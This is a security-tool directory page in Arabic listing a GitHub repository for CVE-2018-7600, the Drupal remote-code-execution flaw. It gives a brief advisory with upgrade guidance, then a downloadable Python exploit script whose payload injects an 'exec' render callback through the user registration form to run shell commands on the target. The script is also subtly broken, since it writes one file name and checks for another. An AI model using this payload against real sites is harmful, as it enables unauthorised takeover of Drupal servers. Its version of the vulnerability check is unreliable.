Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-7600. — CVE-2018-7600. | Kitploit
أدوات/GitHubGitHub/tpdlshdmlrkfmcla/cve-2018-7600.
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubtpdlshdmlrkfmcla/cve-2018-7600.

CVE-2018-7600.

CVE-2018-7600.

عرض المستودع
5منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

IGLOO Corp, Won Chi Hyun تقرير تحليل Drupal RCE

Drupal RCE CVE-2018-7600

لا تنسى وضع عنوانك في السكريبت!

الوصف: توجد ثغرة تنفيذ كود عن بُعد داخل أنظمة فرعية متعددة لـ Drupal 7.x و 8.x. قد تسمح هذه الثغرة للمهاجمين باستغلال عدة نواقل هجوم على موقع Drupal، مما قد يؤدي إلى اختراق الموقع بالكامل.

الحل: قم بالترقية إلى أحدث إصدار من نواة Drupal 7 أو 8.

إذا كنت تستخدم 7.x، قم بالترقية إلى Drupal 7.58. (إذا لم تتمكن من التحديث فورًا، يمكنك محاولة تطبيق هذا التصحيح لإصلاح الثغرة إلى أن تتمكن من التحديث الكامل.) إذا كنت تستخدم 8.5.x، قم بالترقية إلى Drupal 8.5.1. (إذا لم تتمكن من التحديث فورًا، يمكنك محاولة تطبيق هذا التصحيح لإصلاح الثغرة إلى أن تتمكن من التحديث الكامل.)

root@kitploit:~
#!/usr/bin/python2.7
'''_____________________________________________________________________
|[] R3DXPL0IT SHELL                                            |ROOT]|!"|
|"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"| 
|CODED BY > R3DXPLOIT(JIMMY)                                          | |
|EMAIL > [email protected]                                   | |
|GITHUB > https://github.com/r3dxpl0it                                | |
|WEB-PAGE > https://r3dxpl0it.Github.io                               |_|
|_____________________________________________________________________|/|
'''
'''
https://nvd.nist.gov/vuln/detail/CVE-2018-7600#
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600
'''
import sys
import requests

def exploit(target):
    pass
    proxies = {}
    verify = False

    payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "vulnerable to cve-7600-2018 exploit" | tee r3dxploit.txt'}
    url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
    print ( '[*]' + ' requesting post')
    r = requests.post(url, proxies=proxies, data=payload, verify=verify)
    try:
        scan = requests.get(target + 'vulnerable.txt')
        if scan.status_code != 200:
           print ( ' not vulnerable to cve-2018-7600 exploit \n')
        if scan.status_code == 200:
           print (' vulnerable to cve-2018-7600 exploit')
           print (' url: ' + target + 'vulnerable.txt \n')
    except requests.ConnectionError:
        print (' target connection timeout')
    except Exception as e :
        print ('Connction Failed ' + e )
				

if __name__ == '__main__':
   exploit(sys.argv[1])
تنزيل الأداة

تحليل الكود.

main -> exploit
argv[1] - وسيط الهدف
scan. يتم إخراج النتيجة بناءً على حالة كود status_code
معالجة استثناءات الأحداث